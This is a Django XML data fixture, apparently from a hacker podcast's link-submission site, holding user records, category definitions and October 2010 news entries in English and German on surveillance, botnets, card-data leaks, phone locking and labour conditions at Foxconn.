pngs/data.27c3/pentamedia.xml

2111 lines
1.0 MiB
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0"><object pk="1" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">1</field></object><object pk="2" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">2</field></object><object pk="3" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">3</field></object><object pk="4" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">4</field></object><object pk="5" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">5</field></object><object pk="6" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">6</field></object><object pk="15" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">17</field></object><object pk="13" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">15</field></object><object pk="14" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">16</field></object><object pk="16" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">18</field></object><object pk="17" model="submitter.submitter"><field to="auth.user" name="user" rel="ManyToOneRel">23</field></object><object pk="1" model="submitter.entrycategory"><field type="CharField" name="title">Patent of the Month</field><field type="SlugField" name="slug">patentofth</field><field type="TextField" name="description">This category collects funny trivial patents on software.</field><field type="CharField" name="tags_string"></field></object><object pk="2" model="submitter.entrycategory"><field type="CharField" name="title">Software of the month</field><field type="SlugField" name="slug">softwareof</field><field type="TextField" name="description">This if for good, useful, hacky, great, bla, bla software.</field><field type="CharField" name="tags_string"></field></object><object pk="3" model="submitter.entrycategory"><field type="CharField" name="title">Politics</field><field type="SlugField" name="slug">politics</field><field type="TextField" name="description">General politics with focus on net politics</field><field type="CharField" name="tags_string"></field></object><object pk="4" model="submitter.entrycategory"><field type="CharField" name="title">Generic</field><field type="SlugField" name="slug">generic</field><field type="TextField" name="description">What doesn't fit somewhere else...</field><field type="CharField" name="tags_string"></field></object><object pk="5" model="submitter.entrycategory"><field type="CharField" name="title">Hack of the Month</field><field type="SlugField" name="slug">hackofthem</field><field type="TextField" name="description">Name a hack of all kinds that has a big hack value.</field><field type="CharField" name="tags_string"></field></object><object pk="6" model="submitter.entrycategory"><field type="CharField" name="title">Anniversary</field><field type="SlugField" name="slug">anniversar</field><field type="TextField" name="description">Anniversary of something special, historically important...</field><field type="CharField" name="tags_string"></field></object><object pk="7" model="submitter.entrycategory"><field type="CharField" name="title">Facepalm of the Month</field><field type="SlugField" name="slug">facepalmof</field><field type="TextField" name="description">Facepalm of the Month</field><field type="CharField" name="tags_string"></field></object><object pk="8" model="submitter.entrycategory"><field type="CharField" name="title">Event</field><field type="SlugField" name="slug">event</field><field type="TextField" name="description">Events that happened or will happen...</field><field type="CharField" name="tags_string"></field></object><object pk="9" model="submitter.entrycategory"><field type="CharField" name="title">Vulnerability</field><field type="SlugField" name="slug">vulnerabil</field><field type="TextField" name="description">Vulnerabilities having some kind of uniqueness.</field><field type="CharField" name="tags_string"></field></object><object pk="10" model="submitter.entrycategory"><field type="CharField" name="title">Data Loss of the Month</field><field type="SlugField" name="slug">dataloss</field><field type="TextField" name="description">Big data losses will be honoured.</field><field type="CharField" name="tags_string">dataloss</field></object><object pk="11" model="submitter.entrycategory"><field type="CharField" name="title">WikiDeletia of the Month</field><field type="SlugField" name="slug">wikideletiaofthemonth</field><field type="TextField" name="description">The most m( deletion in Wikipedia of the month</field><field type="CharField" name="tags_string">wikipedia</field></object><object pk="561" model="submitter.newsentry"><field type="CharField" name="title">Need a new reason to be creeped out by Facebook?</field><field type="TextField" name="excerpt">Big news this week from The Electronic Frontier Foundation: the digital rights group FOIA'd some disturbing documents for its lawsuit on the US goverment's surveillance of social networks which show that feds sometimes attempt to "friend" people applying for citizenship, or people that fit certain demographics, ostensibly to sniff out terrorist threats.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Big news this week from The Electronic Frontier Foundation: the digital rights group FOIA'd some disturbing documents for its lawsuit on the US goverment's surveillance of social networks which show that feds sometimes attempt to "friend" people applying for citizenship, or people that fit certain demographics, ostensibly to sniff out terrorist threats.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.eff.org/deeplinks/2010/10/applying-citizenship-u-s-citizenship-and</field><field type="FileField" name="page_screenshot">page_shots/2010/10/14/needanewreasontobecreepedoutbyfacebook.png</field><field type="SlugField" name="slug">needanewreasontobecreepedoutbyfacebook</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-14 21:26:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">bürgerrechte, digital, eff, facebook, feds, foi, online, social network, surveillance, tracking</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="560" model="submitter.newsentry"><field type="CharField" name="title">BBC News - Two million US PCs recruited to botnets</field><field type="TextField" name="excerpt">The US leads the world in numbers of Windows PCs that are part of botnets, reveals a report.
More than *2.2* million US PCs were found to be part of botnets, networks of hijacked home computers, in the first six months of 2010, it said.
Compiled by Microsoft, the research revealed that Brazil had the second highest level of infections at 550,000.
Infections were highest in South Korea where 14.6 out of every 1000 machines were found to be enrolled in botnets.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The US leads the world in numbers of Windows PCs that are part of botnets, reveals a report.
&lt;/p&gt;
&lt;p&gt;More than &lt;em&gt;2.2&lt;/em&gt; million US PCs were found to be part of botnets, networks of hijacked home computers, in the first six months of 2010, it said.
&lt;/p&gt;
&lt;p&gt;Compiled by Microsoft, the research revealed that Brazil had the second highest level of infections at 550,000.
&lt;/p&gt;
&lt;p&gt;Infections were highest in South Korea where 14.6 out of every 1000 machines were found to be enrolled in botnets.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.bbc.co.uk/news/technology-11531657</field><field type="FileField" name="page_screenshot">page_shots/2010/10/14/bbcnews-twomillionuspcsrecruitedtobotnets.png</field><field type="SlugField" name="slug">bbcnews-twomillionuspcsrecruitedtobotnets</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-14 16:43:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">botnet</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="559" model="submitter.newsentry"><field type="CharField" name="title">heise online - Bericht: Easycash verkauft Bewegungsprofile von EC-Kartenkunden</field><field type="TextField" name="excerpt">Der EC-Kartendienstleister Easycash nutzt die ihm anvertrauten personenbezogenen Daten von Millionen Kunden, die in Geschäften bargeldlos zahlen, offenbar zur eigenen Gewinnmaximierung. Wie der Radiosender NDR Info berichtet, bietet das Tochterunternehmen Easycash Loyalty Solutions Pakete mit Datensätzen von EC-Kartenkunden an, die bis auf "eindeutige Kontoverbindungen pro Straße" heruntergebrochen sind. Für 5000 Euro pro Tausender-Paket sollen auch "Bewegungsprofile" von Kunden sowie Informationen über die "Kundenqualität" und den "Ausschöpfungsgrad" der Kunden erhältlich sein. Insgesamt soll es mindestens zehn verschiedene Auswertungsformen geben.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der EC-Kartendienstleister Easycash nutzt die ihm anvertrauten personenbezogenen Daten von Millionen Kunden, die in Geschäften bargeldlos zahlen, offenbar zur eigenen Gewinnmaximierung. Wie der Radiosender NDR Info berichtet, bietet das Tochterunternehmen Easycash Loyalty Solutions Pakete mit Datensätzen von EC-Kartenkunden an, die bis auf "eindeutige Kontoverbindungen pro Straße" heruntergebrochen sind. Für 5000 Euro pro Tausender-Paket sollen auch "Bewegungsprofile" von Kunden sowie Informationen über die "Kundenqualität" und den "Ausschöpfungsgrad" der Kunden erhältlich sein. Insgesamt soll es mindestens zehn verschiedene Auswertungsformen geben.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Bericht-Easycash-verkauft-Bewegungsprofile-von-EC-Kartenkunden-1107760.html</field><field type="FileField" name="page_screenshot">page_shots/2010/10/14/heiseonline-berichteasycashverkauftbewegung.png</field><field type="SlugField" name="slug">heiseonline-berichteasycashverkauftbewegung</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-14 11:36:08</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">easycash</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="558" model="submitter.newsentry"><field type="CharField" name="title">How To: Brew beer in a coffee maker, using only materials found on a modestly sized oceanographic research vessel</field><field type="TextField" name="excerpt">Who knew science had so much in common with prison?
Southern Fried Scientist explains how you can set up your own franchise of Baby Duck Breweries, using a coffee maker, cereal flakes, Vegemite "malt", seaweed "hops", and baker's yeast.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Who knew science had so much in common with prison?
&lt;/p&gt;
&lt;p&gt;Southern Fried Scientist explains how you can set up your own franchise of Baby Duck Breweries, using a coffee maker, cereal flakes, Vegemite "malt", seaweed "hops", and baker's yeast.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.southernfriedscience.com/?p=1419</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/howtobrewbeerinacoffeemakerusingonlyma.png</field><field type="SlugField" name="slug">howtobrewbeerinacoffeemakerusingonlyma</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 14:58:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">beer food prision ship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="557" model="submitter.newsentry"><field type="CharField" name="title">Canon's printer/photocopier blocks jobs based on keywords </field><field type="TextField" name="excerpt">Canon's new printer/scanner/fax devices can search jobs for keywords (say, the names of sensitive clients) and stop jobs if they contain them. I'm of mixed minds about this feature. On the one hand, I can see how it would go some ways to, say, preventing unscrupulous employees from printing out confidential docs and breaching the privacy of clients. On the other hand, the record is pretty clear on what happens with keyword blocking -- it's trivial to circumvent by dedicated bad guys, and it screws up the good guys (I remember AOL blocking "Phuc" as an alternate spelling for "Fuck" and rendering its Vietnamese chat rooms all but unusable; and by all accounts, it's pretty miserable trying to research breast cancer on a censored school network).
Ultimately, regular expressions are a poor substitute for trustworthy employees, minimal data gathering, and assiduous purging of old records.
Update: From the comments, Sabik adds: "Or, of course, you could set it up as part of industrial espionage so that when it detects a keyword, it e-mails the PDF out of the company." That's the stuff, right there -- forgotten feature in your Canon printer is activated by a rogue employee! </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Canon's new printer/scanner/fax devices can search jobs for keywords (say, the names of sensitive clients) and stop jobs if they contain them. I'm of mixed minds about this feature. On the one hand, I can see how it would go some ways to, say, preventing unscrupulous employees from printing out confidential docs and breaching the privacy of clients. On the other hand, the record is pretty clear on what happens with keyword blocking -- it's trivial to circumvent by dedicated bad guys, and it screws up the good guys (I remember AOL blocking "Phuc" as an alternate spelling for "Fuck" and rendering its Vietnamese chat rooms all but unusable; and by all accounts, it's pretty miserable trying to research breast cancer on a censored school network).
&lt;/p&gt;
&lt;p&gt;Ultimately, regular expressions are a poor substitute for trustworthy employees, minimal data gathering, and assiduous purging of old records.
&lt;/p&gt;
&lt;p&gt;Update: From the comments, Sabik adds: "Or, of course, you could set it up as part of industrial espionage so that when it detects a keyword, it e-mails the PDF out of the company." That's the stuff, right there -- forgotten feature in your Canon printer is activated by a rogue employee!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.itnews.com.au/News/235047,canon-blocks-copy-jobs-by-keyword.aspx</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/canonsprinterphotocopierblocksjobsbasedonk.png</field><field type="SlugField" name="slug">canonsprinterphotocopierblocksjobsbasedonk</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 14:40:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">dataloss espionage hack prevention print privacy privatssphäre regex</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="556" model="submitter.newsentry"><field type="CharField" name="title">More on the T-Mobile G2 "rootkit" -- it's actually a "NAND Lock" (and it's still a ripoff)</field><field type="TextField" name="excerpt">Ars Technica's Ryan Paul has a write-up about the "rootkit" in the new T-Mobile HTC G2 phone. Background: New America Foundation recently sounded an alarm about a countermeasure built into the new G2 handsets that T-Mobile was selling. The countermeasure watches to see if you've changed your phone's OS, and if you have, it wipes out your changes and reinstalls T-Mobile's stock firmware. New America erroneously called this a rootkit; it's technically called a "NAND Lock," and other HTC handsets have come from carriers locked like this too.
However, fact remains that T-Mobile has chosen to lock its handsets to prevent their owners from rooting/jailbreaking them. As a 10-year T-Mobile US customer who bought two full-price HTC Android handsets from T-Mobile for the purpose of rooting them so that I could load my own software, I find this repellent. I'm not the only one -- this year, the US Copyright Office carved out a legal exemption in order to explicitly legalize opening up your mobile phone. A statement from T-Mobile calls this a "side-effect" of a corruption prevention method, but this is horsewash: if all T-Mobile cares about is stopping your phone from getting corrupted, they could give jailbreakers the keys necessary to open up their handsets.
The good news is that the phone jailbreaking community generally gets through this stuff with relative ease, and the G2 will fall sooner rather than later. But what a misery it is that the mobile phone companies continue to spend good money to frustrate the legitimate activities of their customers. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ars Technica's Ryan Paul has a write-up about the "rootkit" in the new T-Mobile HTC G2 phone. Background: New America Foundation recently sounded an alarm about a countermeasure built into the new G2 handsets that T-Mobile was selling. The countermeasure watches to see if you've changed your phone's OS, and if you have, it wipes out your changes and reinstalls T-Mobile's stock firmware. New America erroneously called this a rootkit; it's technically called a "NAND Lock," and other HTC handsets have come from carriers locked like this too.
&lt;/p&gt;
&lt;p&gt;However, fact remains that T-Mobile has chosen to lock its handsets to prevent their owners from rooting/jailbreaking them. As a 10-year T-Mobile US customer who bought two full-price HTC Android handsets from T-Mobile for the purpose of rooting them so that I could load my own software, I find this repellent. I'm not the only one -- this year, the US Copyright Office carved out a legal exemption in order to explicitly legalize opening up your mobile phone. A statement from T-Mobile calls this a "side-effect" of a corruption prevention method, but this is horsewash: if all T-Mobile cares about is stopping your phone from getting corrupted, they could give jailbreakers the keys necessary to open up their handsets.
&lt;/p&gt;
&lt;p&gt;The good news is that the phone jailbreaking community generally gets through this stuff with relative ease, and the G2 will fall sooner rather than later. But what a misery it is that the mobile phone companies continue to spend good money to frustrate the legitimate activities of their customers.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/open-source/news/2010/10/g2-doesnt-have-rootkit-its-just-the-same-old-nand-lock.ars?old=mobile</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/moreonthet-mobileg2rootkit-itsactually.png</field><field type="SlugField" name="slug">moreonthet-mobileg2rootkit-itsactually</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 14:36:29</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">android, bürgerrechte, imaginary property, rootkit, t-mobile</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="555" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - view - Stuttgart 21: Systematische Löschung von Beweisvideos? </field><field type="TextField" name="excerpt">S21-Videos verschwinden von youtube</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;S21-Videos verschwinden von youtube
&lt;/p&gt;</field><field type="CharField" name="external_url">http://gulli.com/news/stuttgart-21-systematische-l-schung-von-beweisvideos-2010-10-13</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/gullicom-news-view-stuttgart21systematis.png</field><field type="SlugField" name="slug">gullicom-news-view-stuttgart21systematis</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 10:27:50</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">youtube</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="554" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - view - Ende der Webcam-Affäre: Schule zahlt 600.000 US-Dollar Entschädigung</field><field type="TextField" name="excerpt">Followup zur Webcam-Spy-Kekse-Drugs Geschichte: Schadensersatz 600k USD</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Followup zur Webcam-Spy-Kekse-Drugs Geschichte: Schadensersatz 600k USD
&lt;/p&gt;</field><field type="CharField" name="external_url">http://gulli.com/news/ende-der-webcam-aff-re-schule-zahlt-600-000-us-dollar-entsch-digung-2010-10-12</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/gullicom-news-view-endederwebcam-affare.png</field><field type="SlugField" name="slug">gullicom-news-view-endederwebcam-affare</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 10:25:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">spyware webcam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="553" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - view - Deutsche Telekom ließ Kundenbewertungen fälschen</field><field type="TextField" name="excerpt">Um mehr Geschäftigkeit im eigenen Internet-Shopping-Portal vorzutäuschen, ließ die Telekom Hunderte Kundenrezensionen fälschen. Die Textagentur „Textprovider“ wurde beauftragt, 1000 kurze Bewertungen für Produkte des Online-Kaufhauses zu erstellen. Auf diesem Wege wollte man die eigene Internetseite „aufwerten“ lassen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Um mehr Geschäftigkeit im eigenen Internet-Shopping-Portal vorzutäuschen, ließ die Telekom Hunderte Kundenrezensionen fälschen. Die Textagentur „Textprovider“ wurde beauftragt, 1000 kurze Bewertungen für Produkte des Online-Kaufhauses zu erstellen. Auf diesem Wege wollte man die eigene Internetseite „aufwerten“ lassen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.gulli.com/news/deutsche-telekom-liess-kundenbewertungen-f-lschen-2010-10-10</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/gullicom-news-view-deutschetelekomlieku.png</field><field type="SlugField" name="slug">gullicom-news-view-deutschetelekomlieku</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 10:24:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">telekom</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="552" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - view - Zensur: Wikimedia ließ Artikel bei Telepolis löschen! (Update)</field><field type="TextField" name="excerpt">Ohne genauere Begründung entfernte der Heise Verlag seinen Artikel über die geplante Auslagerung von Vereinsaufgaben in die eigens dafür gegründete gGmbH. Stunden zuvor hatte die Leitung von Wikimedia den Heise Verlag anwaltlich kontaktiert.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ohne genauere Begründung entfernte der Heise Verlag seinen Artikel über die geplante Auslagerung von Vereinsaufgaben in die eigens dafür gegründete gGmbH. Stunden zuvor hatte die Leitung von Wikimedia den Heise Verlag anwaltlich kontaktiert.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.gulli.com/news/zensur-wikimedia-liess-artikel-bei-telepolis-l-schen-2010-10-05</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/gullicom-news-view-zensurwikimedialiea.png</field><field type="SlugField" name="slug">gullicom-news-view-zensurwikimedialiea</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 10:23:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">wikipedia</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="551" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - view - Microsoft: Kein Internet für infizierte Rechner</field><field type="TextField" name="excerpt">MS will deren Schrott aus dem Netz ziehen. Kappen der Internetverbindung für infizierte Rechner. Yeah!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;MS will deren Schrott aus dem Netz ziehen. Kappen der Internetverbindung für infizierte Rechner. Yeah!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.gulli.com/news/microsoft-kein-internet-f-r-infizierte-rechner-2010-10-06</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/gullicom-news-view-microsoftkeininternet.png</field><field type="SlugField" name="slug">gullicom-news-view-microsoftkeininternet</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 10:21:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">antivirus microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="550" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - view - Angreifer löschten sämtliche Dokumente auf Cryptome (Update)</field><field type="TextField" name="excerpt">Cryptome got hacked. All files deleted. Most of them recovered.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Cryptome got hacked. All files deleted. Most of them recovered.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.gulli.com/news/angreifer-l-schten-s-mtliche-dokumente-auf-cryptome-2010-10-06</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/gullicom-news-view-angreiferloschtensamtl.png</field><field type="SlugField" name="slug">gullicom-news-view-angreiferloschtensamtl</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 10:19:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">cryptome</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="549" model="submitter.newsentry"><field type="CharField" name="title">Foxconn Bericht über Arbeitsbedingungen</field><field type="TextField" name="excerpt">Foxconn, Hersteller von viel Rechnerzeugs (u. a. Apple) ist aufgefallen durch Selbstmorde. Wollte Löhne erhöhen.
Jetzt Untersuchungsbericht:
Die Umfrage unter den Arbeitern beim Foxconn-Konzern zeigte allerdings, dass ihre tatsächlichen Einkommen nicht angehoben worden waren, sondern nur umverteilt worden sind. Das Basisgehalt eines Arbeiters lag im Mai bei etwas 1800 RMB. Es wurde im August offiziell auf 2000 erhöht. Lohnzuschüsse und andere Prämien am Quartal- und Jahresende wurden dafür aber aufgehoben, ifeng.com zitiert hier den Bericht. Zudem sei die Arbeitsmenge nach der sogenannten “Lohnerhöhung” ebenfalls angestiegen. Die unbezahlten Überstunden unter den Arbeitern nahmen demnach zu.
Dem Bericht zufolge bilden die Praktikanten, die kurz vor dem Abschluss an der Universität stehen, fast die Hälfte der Arbeitskräfte in der Firma.
Das Unternehmen wurde im Bericht als "KZ des 21. Jahrhunderts" bezeichnet, die Mitarbeiter seien "eingesperrt", um dem Fertigungskonzept von "just-in-time-Produktion" zu dienen. Die Studierenden seien laut dem Bericht "entführt", um Überstunden für die Firma zu machen. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Foxconn, Hersteller von viel Rechnerzeugs (u. a. Apple) ist aufgefallen durch Selbstmorde. Wollte Löhne erhöhen.
Jetzt Untersuchungsbericht:
Die Umfrage unter den Arbeitern beim Foxconn-Konzern zeigte allerdings, dass ihre tatsächlichen Einkommen nicht angehoben worden waren, sondern nur umverteilt worden sind. Das Basisgehalt eines Arbeiters lag im Mai bei etwas 1800 RMB. Es wurde im August offiziell auf 2000 erhöht. Lohnzuschüsse und andere Prämien am Quartal- und Jahresende wurden dafür aber aufgehoben, ifeng.com zitiert hier den Bericht. Zudem sei die Arbeitsmenge nach der sogenannten “Lohnerhöhung” ebenfalls angestiegen. Die unbezahlten Überstunden unter den Arbeitern nahmen demnach zu.
&lt;/p&gt;
&lt;p&gt;Dem Bericht zufolge bilden die Praktikanten, die kurz vor dem Abschluss an der Universität stehen, fast die Hälfte der Arbeitskräfte in der Firma.
&lt;/p&gt;
&lt;p&gt;Das Unternehmen wurde im Bericht als "KZ des 21. Jahrhunderts" bezeichnet, die Mitarbeiter seien "eingesperrt", um dem Fertigungskonzept von "just-in-time-Produktion" zu dienen. Die Studierenden seien laut dem Bericht "entführt", um Überstunden für die Firma zu machen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://german.china.org.cn/fokus/2010-10/09/content_21089281.htm</field><field type="FileField" name="page_screenshot">page_shots/2010/10/13/unknowntitle003.png</field><field type="SlugField" name="slug">unknowntitle003</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-13 10:14:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">foxconn</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="548" model="submitter.newsentry"><field type="CharField" name="title">
Tatort Redaktion &amp;#8211; der Lynchmob wird losgelassen » F!XMBR </field><field type="TextField" name="excerpt">Tatort Internet Bashing:
* Lynchmob
* Quote
* 80% von Kindesmißbrauch in Familie
* keine Hilfe für irgend einen Beteiligten
* PornoSteffi
* Polizei ermittelt in .de Bei den Fällen haben die wohl keinen Anfangsverdacht gesehen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Tatort Internet Bashing:
&lt;em&gt; Lynchmob
&lt;/em&gt; Quote
&lt;em&gt; 80% von Kindesmißbrauch in Familie
&lt;/em&gt; keine Hilfe für irgend einen Beteiligten
&lt;em&gt; PornoSteffi
&lt;/em&gt; Polizei ermittelt in .de Bei den Fällen haben die wohl keinen Anfangsverdacht gesehen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.fixmbr.de/tatort-redaktion-der-lynchmob-wird-losgelassen/</field><field type="FileField" name="page_screenshot">page_shots/2010/10/12/tatortredaktion8211derlynchmobw.png</field><field type="SlugField" name="slug">tatortredaktion8211derlynchmobw</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-12 20:57:35</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">child porn, rtl2</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="547" model="submitter.newsentry"><field type="CharField" name="title">Grocery terminals slurped payment card data • The Register</field><field type="TextField" name="excerpt">Bei Aldi USA haben die Point-of-Sales Kassen die Kartendaten kopiert, 2 Monate lang.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Bei Aldi USA haben die Point-of-Sales Kassen die Kartendaten kopiert, 2 Monate lang.
